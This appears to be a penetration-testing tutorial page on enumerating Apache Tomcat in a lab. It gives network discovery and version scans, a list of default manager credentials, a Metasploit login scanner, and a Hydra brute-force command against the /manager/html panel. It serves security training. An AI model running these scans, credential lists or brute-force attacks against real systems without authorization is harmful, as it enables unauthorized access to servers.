Enumeration
Topics
Enumeration
After completing the setup, begin the enumeration phase.
On Kali Linux, use netdiscover
to identify machines in the network:
sudo netdiscover
After identifying the victim machine's IP address, perform further enumeration using Nmap:
nmap -sV <tomcat_target_ip> -p 8080
It usually runs on port 8080
Common Tomcat error:

Version Identification
To find the version of Apache Tomcat, a simple command can be executed:
Copy
curl -s http://<tomcat_target_ip>:8080/docs/ | grep Tomcat
This will search for the term "Tomcat" in the documentation index page, revealing the version in the title tag of the HTML response.
Default Credentials
The /manager/html directory is highly sensitive, as it allows WAR file uploads for potential code execution. Common credentials to test include:
admin:admin
tomcat:tomcat
admin:
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
You can test these using:
msf> use auxiliary/scanner/http/tomcat_mgr_login
Another directory to monitor is /manager/status, which reveals the Tomcat and OS version, aiding in vulnerability assessment.
Brute Force Attacks
To brute force the /manager/html directory, use tools like Hydra:
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f <tomcat_target_ip> http-get /manager/html
Last updated